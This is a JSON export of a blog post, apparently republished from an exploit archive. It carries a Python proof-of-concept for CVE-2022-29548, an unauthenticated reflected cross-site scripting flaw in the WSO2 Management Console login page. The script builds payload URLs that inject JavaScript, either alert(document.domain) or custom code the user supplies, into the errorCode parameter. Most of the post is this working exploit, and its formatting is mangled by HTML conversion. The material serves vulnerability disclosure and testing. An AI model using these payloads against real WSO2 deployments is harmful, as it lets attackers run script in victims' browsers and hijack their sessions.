{"id":26290,"date":"2022-06-27T22:30:00","date_gmt":"2022-06-27T18:30:00","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167587\/ws02mc-xss.txt"},"modified":"2022-07-13T10:52:36","modified_gmt":"2022-07-13T06:22:36","slug":"wso2-management-console-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wso2-management-console-cross-site-scripting\/","title":{"rendered":"WSO2 Management Console Cross Site Scripting"},"content":{"rendered":"<pre dir=\"ltr\"><code># Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)\r\n# Date: 21 Apr 2022\r\n# Exploit Author: cxosmo\r\n# Vendor Homepage: https:\/\/wso2.com\r\n# Software Link: API Manager (https:\/\/wso2.com\/api-manager\/), Identity Server (https:\/\/wso2.com\/identity-server\/), Enterprise Integrator (https:\/\/wso2.com\/integration\/) \r\n# Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0; \r\n# API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;\r\n# API Microgateway 2.2.0;\r\n# Data Analytics Server 3.2.0;\r\n# Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;\r\n# IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;\r\n# Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;\r\n# Identity Server Analytics 5.5.0 and 5.6.0;\r\n# WSO2 Micro Integrator 1.0.0.\r\n# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)\r\n# CVE: CVE-2022-29548<\/code><\/pre>\n<p dir=\"ltr\">import argparse<br \/>\nimport logging<br \/>\nimport urllib.parse<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\"># Global variables<br \/>\nVULNERABLE_ENDPOINT = &#8220;\/carbon\/admin\/login.jsp?loginStatus=false&amp;errorCode=&#8221;<br \/>\nDEFAULT_PAYLOAD = &#8220;alert(document.domain)&#8221;<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\"># Logging config<br \/>\nlogging.basicConfig(level=logging.INFO, format=&#8221;&#8221;)<br \/>\nlog = logging.getLogger()<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\">def generate_payload(url, custom_payload=False):<br \/>\nlog.info(f&#8221;Generating payload for {url}&#8230;&#8221;)<br \/>\nif custom_payload:<br \/>\nlog.info(f&#8221;[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}\/\/&#8221;)<br \/>\nelse:<br \/>\nlog.info(f&#8221;[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}\/\/&#8221;)<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\">def clean_url_input(url):<br \/>\nif url.count(&#8220;\/&#8221;) &gt; 2:<br \/>\nreturn f&#8221;{url.split(&#8216;\/&#8217;)[0]}\/\/{url.split(&#8216;\/&#8217;)[2]}&#8221;<br \/>\nelse:<br \/>\nreturn url<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\">def check_payload(payload):<br \/>\nencoded_characters = [&#8216;&#8221;&#8216;, &#8216;&lt;&#8216;, &#8216;&gt;&#8217;]\nif any(character in payload for character in encoded_characters):<br \/>\nlog.info(f&#8221;Unsupported character(s) (\\&#8221;, &lt;, &gt;) found in payload.&#8221;)<br \/>\nreturn False<br \/>\nelse:<br \/>\nreturn urllib.parse.quote(payload)<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\">if __name__ == &#8220;__main__&#8221;:<br \/>\n# Parse command line<br \/>\nparser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)<br \/>\nrequired_arguments = parser.add_argument_group(&#8216;required arguments&#8217;)<br \/>\nrequired_arguments.add_argument(&#8220;-t&#8221;, &#8220;&#8211;target&#8221;,<br \/>\nhelp=&#8221;Target address {protocol:\/\/host} of vulnerable WSO2 application (e.g. https:\/\/localhost:9443)&#8221;,<br \/>\nrequired=&#8221;True&#8221;, action=&#8221;store&#8221;)<br \/>\nparser.add_argument(&#8220;-p&#8221;, &#8220;&#8211;payload&#8221;,<br \/>\nhelp=&#8221;Use custom JavaScript for generated payload (Some characters (\\&#8221;&lt;&gt;) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))&#8221;,<br \/>\naction=&#8221;store&#8221;, default=False)<br \/>\nargs = parser.parse_args()<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\"># Clean user target input<br \/>\nargs.target = clean_url_input(args.target.lower())<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\"># Check for unsupported characters in custom payload; URL-encode as required<br \/>\nif args.payload:<br \/>\nargs.payload = check_payload(args.payload)<br \/>\nif args.payload:<br \/>\ngenerate_payload(args.target, args.payload)<br \/>\nelse:<br \/>\ngenerate_payload(args.target)<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\">\n<pre dir=\"ltr\"><code><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WSO2 Management Console (Multiple Products) &#8211; Unauthenticated Reflected Cross-Site Scripting (XSS) # Date: 21 Apr 2022 # Exploit Author: cxosmo # Vendor Homepage: https:\/\/wso2.com # Software Link: API Manager (https:\/\/wso2.com\/api-manager\/), Identity Server (https:\/\/wso2.com\/identity-server\/), Enterprise Integrator (https:\/\/wso2.com\/integration\/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0; # API Manager &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-26290","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26290","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=26290"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26290\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=26290"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=26290"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=26290"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}